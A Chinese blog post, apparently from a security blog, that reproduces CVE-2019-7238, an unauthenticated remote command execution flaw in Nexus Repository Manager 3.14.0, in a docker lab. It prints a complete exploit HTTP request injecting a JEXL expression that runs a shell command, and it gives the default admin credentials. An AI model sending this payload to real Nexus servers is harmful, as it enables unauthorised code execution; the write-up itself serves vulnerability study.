Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)


Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发 Maven、NuGET 等软件源仓库。其 3.14.0 及之前版本中,存在一处基于 OrientDB 自定义函数的任意 JEXL 表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。

环境搭建

执行如下命令启动 Nexus Repository Manager 3.14.0

docker-compose up -d

等待一段时间环境才能成功启动,访问http://your-ip:8081即可看到 Web 页面。

使用账号密码 admin:admin123 登录后台,然后在 maven-releases 下随便上传一个jar包:

漏洞复现

接口没有校验权限,所以直接发送如下数据包,即可执行 touch /tmp/success 命令:

POST /service/extdirect HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 368
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":
[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('touch /tmp/success')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}

可见,/tmp/success 已成功执行:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
PTH(Pass The Hash) 攻击分析 PTH(Pass The Hash) 攻击分析
PTH(Pass The Hash) 攻击概述获取一台主机的本地管理员组成员账号的口令 NTLM 后,不需破解获取口令明文,使用 PTH 方式,将管理员账号及 NTLM 注入当前会话作为凭据,利用该凭证可以渗透获取周围主机的管理权限 对方主
2019-04-29
下一篇 
Nginx 文件名逻辑漏洞(CVE-2013-4547) Nginx 文件名逻辑漏洞(CVE-2013-4547)
Nginx 文件名逻辑漏洞(CVE-2013-4547)影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 漏洞原理这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的 URI,错误地获取到用户
2019-03-05
  目录